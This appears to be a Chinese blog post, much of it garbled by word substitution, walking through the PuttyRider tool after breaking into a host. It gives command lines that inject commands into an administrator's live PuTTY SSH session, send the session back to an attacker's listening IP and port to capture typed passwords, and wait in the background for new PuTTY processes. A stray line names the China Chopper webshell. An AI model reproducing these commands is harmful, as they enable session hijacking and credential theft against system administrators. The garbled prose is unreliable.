Putty的噩梦 — 渗透工具PuttyRider使用心得分享

Putty的恶梦——浸透对象PuttyRider利专心得分享

我们在入侵到一台主机的时辰,常常会看到管理员的桌面会放着putty.exe,这声名有很年夜的能够性管理员是应用putty远程管理主机的。该对象主假设针对SSH客户端putty的行使,采用DLL注入的体式格式,来完成各类鄙陋的行使姿态。我依次演示该对象的三种行使场景

1.当你远程节制对方主机的时辰,管理员正好用putty毗邻着远程主机

这种情形,我们只需直接注入敕令到以后的putty历程,就可以行使,异常复杂,瑕玷是没有回显。

中国菜刀下载

应用puttyRider.exe –l 检查当进步程中putty正在毗邻的远程主机信息,这里不但能取得远程主机的IP地址和putty历程号,还能在Injected列看到以后是NO,声名我们还没有历程注入。

Putty的噩梦 — 渗透工具PuttyRider使用心得分享

我们应用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig敕令注入到以后的putty会话了,就到达远程敕令执行的目标了。再次puttyRider.exe –l 看一下,发现injected列是yes了,声名我们注入历程成功了。

2.应用反弹的体式格式实时看守理员的输入

除了行使第一种体式格式直接注入敕令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种敕令,我们也可以看到他输入的明文密码。然则这种行使的前提是,对方管理员正在用PUTTY毗邻的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。

Putty的噩梦 — 渗透工具PuttyRider使用心得分享

Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了

3.我命运运限不这么好,对方管理员以后没有正在应用PUTTY管理远程主机

这种景遇应该最罕见了,软件作者也思索到了,给我们供应了-w参数,他会让puttyrider后台看守新起来的历程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包孕输入的账号。

Putty的噩梦 — 渗透工具PuttyRider使用心得分享

Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个敕令后,只需管理员下次再次开启PUTTY的时辰,我们就能在监听的9999端口看到她的SHELL了

最后假设想研讨对象细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深切进修 :)

编译好的二进制文件可以在

下载

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>